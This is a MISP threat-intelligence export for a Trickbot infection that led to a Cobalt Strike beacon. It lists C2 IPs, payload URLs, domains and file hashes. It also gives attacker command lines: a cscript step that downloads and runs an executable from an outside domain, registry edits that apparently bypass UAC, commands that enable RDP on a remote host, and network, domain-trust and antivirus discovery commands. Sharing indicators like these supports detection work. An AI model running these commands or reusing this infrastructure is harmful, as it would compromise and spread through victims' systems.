{
"Event": {
"analysis": "0",
"date": "2020-03-10",
"extends_uuid": "",
"info": "Trickbot Gtag QW1",
"publish_timestamp": "1593748744",
"published": true,
"threat_level_id": "3",
"timestamp": "1621850731",
"uuid": "5e6793ed-2868-4474-a485-42210a0a020f",
"Orgc": {
"name": "laskowski-tech.com",
"uuid": "5e157d76-c92c-4acd-a54e-4a01950d210f"
},
"Tag": [
{
"colour": "#3b9989",
"local": false,
"name": " Cobalt Strike Beacon",
"relationship_type": ""
},
{
"colour": "#991515",
"local": false,
"name": "trickbot",
"relationship_type": ""
},
{
"colour": "#0ab4a7",
"local": false,
"name": "Cobalt Strike",
"relationship_type": ""
},
{
"colour": "#0088cc",
"local": false,
"name": "misp-galaxy:malpedia=\"TrickBot\"",
"relationship_type": ""
},
{
"colour": "#ffffff",
"local": false,
"name": "tlp:white",
"relationship_type": ""
}
],
"Attribute": [
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846956",
"to_ids": true,
"type": "text",
"uuid": "5e67962c-66ec-41ba-8e88-41160a0a020f",
"value": "%WINDIR%\\system32\\cmd.exe /c C:\\DiskDrive\\1\\Volume\\errorfix.bat"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846956",
"to_ids": true,
"type": "text",
"uuid": "5e67962c-5304-4794-a7f1-40e60a0a020f",
"value": "cscript //nologo C:\\DiskDrive\\1\\Volume\\BackFiles\\pinumber[.]vbs hxxp://customscripts.us/QW1.exe C:\\DiskDrive\\1\\Volume\\BackFiles\\Jofert.exe"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846956",
"to_ids": true,
"type": "text",
"uuid": "5e67962c-0d04-4a3b-b127-4f900a0a020f",
"value": "powershell -C Sleep -s 4;Saps 'C:\\DiskDrive\\1\\Volume\\BackFiles\\Jofert.exe'"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846956",
"to_ids": true,
"type": "text",
"uuid": "5e67962c-0890-41b4-8ad5-44c40a0a020f",
"value": "%WINDIR%\\system32\\cmd[.]exe /C reg add HKEY_CURRENT_USER\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command /v \"DelegateExecute\" /t REG_SZ /d \"\" /f"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846956",
"to_ids": true,
"type": "text",
"uuid": "5e67962c-11bc-4765-8d63-426c0a0a020f",
"value": "%WINDIR%\\system32\\cmd.exe /C reg add HKEY_CURRENT_USER\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command /t REG_SZ /d \"%WINDIR%\\system32\\cmd.exe /c start %ALLUSERSPROFILE%\\\u00ec\u02dc\u0081\u00ec\u0192\u0081\u00d8\u00ab\u00d8\u00a7\u00d9\u0081\u00d9\u02c6\u00d8\u00b2\u00d8\u00a8\u00d8\u00aa.exe\" /f"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-056c-4010-89f9-44730a0a020f",
"value": "reg add HKEY_CURRENT_USER\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command /t REG_SZ /d \"%WINDIR%\\system32\\cmd.exe /c start %ALLUSERSPROFILE%\\\u00ec\u02dc\u0081\u00ec\u0192\u0081\u00d8\u00ab\u00d8\u00a7\u00d9\u0081\u00d9\u02c6\u00d8\u00b2\u00d8\u00a8\u00d8\u00aa.exe\" /f"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-6efc-4391-a42e-43560a0a020f",
"value": "reg add HKEY_CURRENT_USER\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command /v \"DelegateExecute\" /t REG_SZ /d \"\" /f"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-b170-4f39-b589-404f0a0a020f",
"value": "\"%WINDIR%\\system32\\cmd[.]exe\" /c start %ALLUSERSPROFILE%\\\u00ec\u02dc\u0081\u00ec\u0192\u0081\u00d8\u00ab\u00d8\u00a7\u00d9\u0081\u00d9\u02c6\u00d8\u00b2\u00d8\u00a8\u00d8\u00aa.exe"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-4778-40ea-bbb0-4d550a0a020f",
"value": "cmd.exe \t/c net config workstation"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-8e84-4b7c-82a2-48340a0a020f",
"value": "cmd.exe /c ipconfig /all"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-1a8c-4983-9d89-40c30a0a020f",
"value": "cmd.exe \t/c net view /all"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-1a00-4fe1-b68c-4d190a0a020f",
"value": "cmd.exe \t/c net view /all /domain"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-d638-4805-b97a-46810a0a020f",
"value": "cmd.exe /c nltest /domain_trusts /all_trusts"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-50d0-4ff7-8730-45a10a0a020f",
"value": "\"%WINDIR%\\system32\\reg.exe\" add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-be20-40c3-a0fc-4c250a0a020f",
"value": "%WINDIR%\\system32\\cmd[.]exe /C reg add \"\\\\usha-bdc\\HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-9430-4d3c-9e36-4f300a0a020f",
"value": "reg add \"\\\\usha-bdc\\HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-5e14-472f-a5ae-4c580a0a020f",
"value": "%WINDIR%\\system32\\cmd.exe /C WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-e270-4656-ad55-4dc10a0a020f",
"value": "WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1583849050",
"to_ids": true,
"type": "ip-dst",
"uuid": "5e679919-46a8-43dd-b8a5-4ec174656a8a",
"value": "95.179.210.8",
"Tag": [
{
"colour": "#0ab4a7",
"local": false,
"name": "Cobalt Strike",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1583849065",
"to_ids": true,
"type": "ip-dst",
"uuid": "5e679919-10c8-46d0-b1bb-4d4d74656a8a",
"value": "50.87.170.67",
"Tag": [
{
"colour": "#991515",
"local": false,
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583849050",
"to_ids": true,
"type": "url",
"uuid": "5e6799c2-a134-491d-9d9e-4d4b0a0a020f",
"value": "https://serviceuphelper.com:80/avxbDFb",
"Tag": [
{
"colour": "#0ab4a7",
"local": false,
"name": "Cobalt Strike",
"relationship_type": ""
}
]
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583849033",
"to_ids": true,
"type": "url",
"uuid": "5e679a4c-e90c-4176-ac29-44f30a0a020f",
"value": "http://customscripts.us/QW1.exe",
"Tag": [
{
"colour": "#991515",
"local": false,
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583849033",
"to_ids": true,
"type": "domain",
"uuid": "5e679e17-e970-4164-bfb5-48b00a0a020f",
"value": "customscripts.us",
"Tag": [
{
"colour": "#991515",
"local": false,
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583849049",
"to_ids": true,
"type": "domain",
"uuid": "5e679e17-4efc-46ea-9030-4d270a0a020f",
"value": "serviceuphelper.com",
"Tag": [
{
"colour": "#0ab4a7",
"local": false,
"name": "Cobalt Strike",
"relationship_type": ""
}
]
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583851022",
"to_ids": true,
"type": "url",
"uuid": "5e67a5f9-ec68-41ea-adeb-40950a0a020f",
"value": "http://64.44.133.131/images/cursor.png",
"Tag": [
{
"colour": "#991515",
"local": false,
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "External analysis",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584443474",
"to_ids": false,
"type": "link",
"uuid": "5e70b052-319c-47bf-a3a8-461c0a0a020f",
"value": "https://laskowski-tech.com/2020/03/16/breakout-time-trickbot-edition/"
}
],
"Object": [
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "17",
"timestamp": "1583850320",
"uuid": "5e67a350-52bc-4280-95d9-4c180a0a020f",
"Attribute": [
{
"category": "Artifacts dropped",
"comment": "",
"data": "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
"deleted": false,
"disable_correlation": false,
"object_relation": "malware-sample",
"timestamp": "1583850320",
"to_ids": true,
"type": "malware-sample",
"uuid": "5e67a350-561c-4073-b344-4eb00a0a020f",
"value": "Jofert.exe|b17e4833c580bbd343a1834be0e2a65f"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "filename",
"timestamp": "1583850320",
"to_ids": false,
"type": "filename",
"uuid": "5e67a350-de10-42d9-bd65-4b140a0a020f",
"value": "Jofert.exe"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1583850320",
"to_ids": true,
"type": "md5",
"uuid": "5e67a350-db84-4f0b-b908-40400a0a020f",
"value": "b17e4833c580bbd343a1834be0e2a65f"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1583850320",
"to_ids": true,
"type": "sha1",
"uuid": "5e67a350-7304-48d4-95c8-4ea30a0a020f",
"value": "7ad2d4c4fe0efd021992391fcdb7e630a19f23f6"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1583850320",
"to_ids": true,
"type": "sha256",
"uuid": "5e67a350-01ec-4b93-a1ad-49800a0a020f",
"value": "5770d351522695562143fbf5d6381cb7c13151e3d3e1cdc923759bc60e025bbe"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1583850320",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "5e67a350-eb98-4bcb-81fa-496c0a0a020f",
"value": "385024"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "17",
"timestamp": "1583850335",
"uuid": "5e67a35f-bc6c-4a73-901f-4d400a0a020f",
"Attribute": [
{
"category": "Artifacts dropped",
"comment": "",
"data": "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",
"deleted": false,
"disable_correlation": false,
"object_relation": "malware-sample",
"timestamp": "1583850335",
"to_ids": true,
"type": "malware-sample",
"uuid": "5e67a35f-84b8-4b2f-bf9f-45ac0a0a020f",
"value": "errorfix.bat|4368db27ef2f07171c2c13d2e537d459"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "filename",
"timestamp": "1583850335",
"to_ids": false,
"type": "filename",
"uuid": "5e67a35f-1804-45fb-955e-430d0a0a020f",
"value": "errorfix.bat"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1583850335",
"to_ids": true,
"type": "md5",
"uuid": "5e67a35f-9a08-4661-9188-48ce0a0a020f",
"value": "4368db27ef2f07171c2c13d2e537d459"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1583850335",
"to_ids": true,
"type": "sha1",
"uuid": "5e67a35f-7b5c-478c-bac1-4ed50a0a020f",
"value": "7993ebdea9421a85b431077b2d89ee3344180759"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1583850335",
"to_ids": true,
"type": "sha256",
"uuid": "5e67a35f-6a6c-4327-9200-407c0a0a020f",
"value": "17b8571df60a9953f7e50edcd623eca414ce9bae64362ba3ab0069778cf40a1a"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1583850335",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "5e67a35f-08a4-48b9-9556-4aeb0a0a020f",
"value": "2864"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "17",
"timestamp": "1583850410",
"uuid": "5e67a3aa-e8c0-4340-8080-475b0a0a020f",
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"data": "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
"deleted": false,
"disable_correlation": false,
"object_relation": "malware-sample",
"timestamp": "1583850410",
"to_ids": true,
"type": "malware-sample",
"uuid": "5e67a3aa-2ad4-4b54-9a8f-49720a0a020f",
"value": "invoice.doc|d627615f955dd5342ef6b4c6938ad98c"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "filename",
"timestamp": "1583850410",
"to_ids": false,
"type": "filename",
"uuid": "5e67a3aa-e0b4-4408-900d-43500a0a020f",
"value": "invoice.doc"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1583850410",
"to_ids": true,
"type": "md5",
"uuid": "5e67a3aa-5950-4d9f-865d-40480a0a020f",
"value": "d627615f955dd5342ef6b4c6938ad98c"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1583850410",
"to_ids": true,
"type": "sha1",
"uuid": "5e67a3aa-1be4-45b9-b565-4fb50a0a020f",
"value": "645467b3207a50c43be075a0b81308a5f6935c59"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1583850410",
"to_ids": true,
"type": "sha256",
"uuid": "5e67a3aa-2888-452a-855d-4f2b0a0a020f",
"value": "1a508909a8ef020ab5285ce47106beac317c2ae0d2971eff9a4f95a5079eee7f"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1583850410",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "5e67a3aa-2e74-45b4-8d8e-48e50a0a020f",
"value": "441560"
}
]
}
]
}
}